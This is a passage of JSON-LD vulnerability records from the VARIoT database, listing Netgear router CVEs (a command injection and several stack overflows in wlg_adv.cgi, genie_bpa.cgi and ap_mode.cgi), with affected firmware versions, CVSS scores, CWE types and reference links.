"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.154"
},
{
"model": "r6400v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.128"
},
{
"model": "xr300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.78"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024098"
},
{
"db": "NVD",
"id": "CVE-2024-52022"
}
]
},
"cve": "CVE-2024-52022",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2024-52022",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 8.0,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2024-024098",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-52022",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2024-024098",
"trust": 0.8,
"value": "High"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024098"
},
{
"db": "NVD",
"id": "CVE-2024-52022"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a command injection vulnerability in the component wlg_adv.cgi via the apmode_gateway parameter. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. R8500 firmware, XR300 firmware, R7000P A command injection vulnerability exists in the firmware and other parts of multiple NETGEAR products.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-52022"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024098"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-52022",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024098",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024098"
},
{
"db": "NVD",
"id": "CVE-2024-52022"
}
]
},
"id": "VAR-202411-2191",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.47773457333333336
},
"last_update_date": "2025-05-23T23:18:07.913000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024098"
},
{
"db": "NVD",
"id": "CVE-2024-52022"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_48/48.md"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-52022"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024098"
},
{
"db": "NVD",
"id": "CVE-2024-52022"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024098"
},
{
"db": "NVD",
"id": "CVE-2024-52022"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-024098"
},
{
"date": "2024-11-05T15:15:27.070000",
"db": "NVD",
"id": "CVE-2024-52022"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-22T02:30:00",
"db": "JVNDB",
"id": "JVNDB-2024-024098"
},
{
"date": "2025-05-21T20:23:37.760000",
"db": "NVD",
"id": "CVE-2024-52022"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Command injection vulnerability in multiple Netgear products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024098"
}
],
"trust": 0.8
}
}
VAR-202411-2364
Vulnerability from variot - Updated: 2025-05-23 23:15Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to multiple stack overflow vulnerabilities in the component wlg_adv.cgi via the apmode_dns1_pri and apmode_dns1_sec parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-2364",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.154"
},
{
"model": "r6400v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.128"
},
{
"model": "xr300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.78"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024082"
},
{
"db": "NVD",
"id": "CVE-2024-52016"
}
]
},
"cve": "CVE-2024-52016",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-52016",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-024082",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-52016",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-024082",
"trust": 0.8,
"value": "Medium"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024082"
},
{
"db": "NVD",
"id": "CVE-2024-52016"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to multiple stack overflow vulnerabilities in the component wlg_adv.cgi via the apmode_dns1_pri and apmode_dns1_sec parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-52016"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024082"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-52016",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2024-024082",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024082"
},
{
"db": "NVD",
"id": "CVE-2024-52016"
}
]
},
"id": "VAR-202411-2364",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.47773457333333336
},
"last_update_date": "2025-05-23T23:15:48.338000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024082"
},
{
"db": "NVD",
"id": "CVE-2024-52016"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_49/49.md"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-52016"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024082"
},
{
"db": "NVD",
"id": "CVE-2024-52016"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024082"
},
{
"db": "NVD",
"id": "CVE-2024-52016"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-024082"
},
{
"date": "2024-11-05T15:15:26.597000",
"db": "NVD",
"id": "CVE-2024-52016"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-22T01:33:00",
"db": "JVNDB",
"id": "JVNDB-2024-024082"
},
{
"date": "2025-05-21T20:23:46.587000",
"db": "NVD",
"id": "CVE-2024-52016"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Classic buffer overflow vulnerability in multiple Netgear products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-024082"
}
],
"trust": 0.8
}
}
VAR-202411-2594
Vulnerability from variot - Updated: 2025-05-10 23:12Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the bpa_server parameter at genie_bpa.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-2594",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.154"
},
{
"model": "xr300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.78"
},
{
"model": "r6400v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.128"
},
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r6400v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023556"
},
{
"db": "NVD",
"id": "CVE-2024-50996"
}
]
},
"cve": "CVE-2024-50996",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-50996",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-023556",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-50996",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-023556",
"trust": 0.8,
"value": "Medium"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023556"
},
{
"db": "NVD",
"id": "CVE-2024-50996"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the bpa_server parameter at genie_bpa.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-50996"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023556"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-50996",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023556",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023556"
},
{
"db": "NVD",
"id": "CVE-2024-50996"
}
]
},
"id": "VAR-202411-2594",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.47773457333333336
},
"last_update_date": "2025-05-10T23:12:10.190000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023556"
},
{
"db": "NVD",
"id": "CVE-2024-50996"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_37/37.md"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-50996"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023556"
},
{
"db": "NVD",
"id": "CVE-2024-50996"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023556"
},
{
"db": "NVD",
"id": "CVE-2024-50996"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023556"
},
{
"date": "2024-11-05T15:15:23.703000",
"db": "NVD",
"id": "CVE-2024-50996"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-09T00:50:00",
"db": "JVNDB",
"id": "JVNDB-2024-023556"
},
{
"date": "2025-05-07T15:25:23.087000",
"db": "NVD",
"id": "CVE-2024-50996"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Classic buffer overflow vulnerability in multiple Netgear products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023556"
}
],
"trust": 0.8
}
}
VAR-202411-2227
Vulnerability from variot - Updated: 2025-05-09 23:31Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to multiple stack overflow vulnerabilities in the component ap_mode.cgi via the apmode_dns1_pri and apmode_dns1_sec parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-2227",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.154"
},
{
"model": "xr300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.78"
